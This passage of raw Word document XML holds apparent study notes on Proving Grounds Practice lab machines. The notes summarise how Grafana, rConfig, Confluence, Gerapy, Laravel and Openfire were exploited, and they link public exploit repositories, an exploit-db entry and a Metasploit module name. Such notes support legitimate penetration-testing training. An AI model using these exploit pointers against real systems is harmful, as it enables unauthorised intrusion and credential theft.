      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="959"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Grafana was exploited in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1338">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Fantastic</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice. In this writeup, they used two exploits, and got a .db file which they found credentials for. And then they fixed up the exploit to crack the hash and got creds for SSH. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="959"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1339">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">This</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a more in-depth tutorial and explains the process more</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A3C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A3D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="230"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rconfig 3.9.4 was exploited in Quackerjack. However, the exploits used were not specific to 3.9.4 but rather 3.9 and 3.93. We started with no creds but then found creds using exploit, and then used another authenticated RCE exploit after getting creds</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A3E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="230"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1340">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">This</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> writeup was the shortest and used this SQL injection exploit for rconfig 3.9 which gave us admin MD5 password hash, and then we used to authenticate, and then we used an RCE exploit to get back shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A3F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="230"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1341">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">This</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> writeup used an unauthenticated RCE exploit which didn't work but did give us the admin MD5 password hash and then used the authenticated RCE exploit to get shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A40">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="230"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1342">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">This</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> writeup was long but goes into more depth </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A41">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A42">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A43">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="905"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Atlassian confluence 7.13.6 was exploited in the Flu PG Practice using an OGNL injection. It was an unauthenticated RCE!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A44">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="905"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1343">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">This</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> writeup tries a bunch of exploits from github and found one that works</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A45">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="905"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1344">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/jbaines-r7/through_the_wire/blob/main/through_the_wire.py</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="905"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1345">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">This</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> writeup uses a metasploit module which worked</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="905"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit(multi/http/atlassian_confluence_namespace_ognl_injection)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A48">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A49">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A4A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1128"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Gerapy 0.9.7 was exploited in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1346">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Levram</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A4C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1128"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1347">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/50640</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1128"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The exploit actually gave a "list index out of range" python error since there were no project created, so we had to manually create a project in order to fix error</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A4E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A4F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A50">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="457"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Laravel 8.4.0 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">was exploited with the help of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lavita </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1348">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">LaVita</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice. Laravel 8.4.0 was only vulnerable to CVE-2021-3129 if it has debug mode on. But it didn't. According to the right up, we can check by going to "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/_ignition/execute-solution</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" and if it gives an error, than debug mode is not on. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A51">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="457"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But then there was another website called Lavita that allowed you to turn debug mode on. And so we did</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="457"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then we can use this exploit on Laravel to get rev shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A53">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="457"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1349">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/joshuavanderpoll/CVE-2021-3129/tree/main</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A54">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A55">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="484"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Openfire 4.7.3 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">was exploited in Fired PG Practice. I read two writeups, and both seemed to use the same strategy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A57">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="484"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The two writeups are </w:t>
      </w:r>
      <w:hyperlink r:id="rId135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and </w:t>
      </w:r>
      <w:hyperlink r:id="rId1351">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3A58">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="484"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They used two exploits: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A59">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="538"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The first one created new admin user and this is how we get past the authentication </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A5A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="538"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1352">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/K3ysTr0K3R/CVE-2023-32315-EXPLOIT\</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="538"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The second is authenticated RCE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A5C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="538"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can use this github (as seen in second writeup)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A5D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="538"/>
        </w:numPr>
        <w:ind w:left="3600" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1353">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/miko550/CVE-2023-32315</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A5E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="538"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or follow a blog post (as seen in first writeup)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="538"/>
        </w:numPr>
        <w:ind w:left="3600" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1354">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.vicarius.io/vsociety/posts/cve-2023-32315-path-traversal-in-openfire-leads-to-rce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A60">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
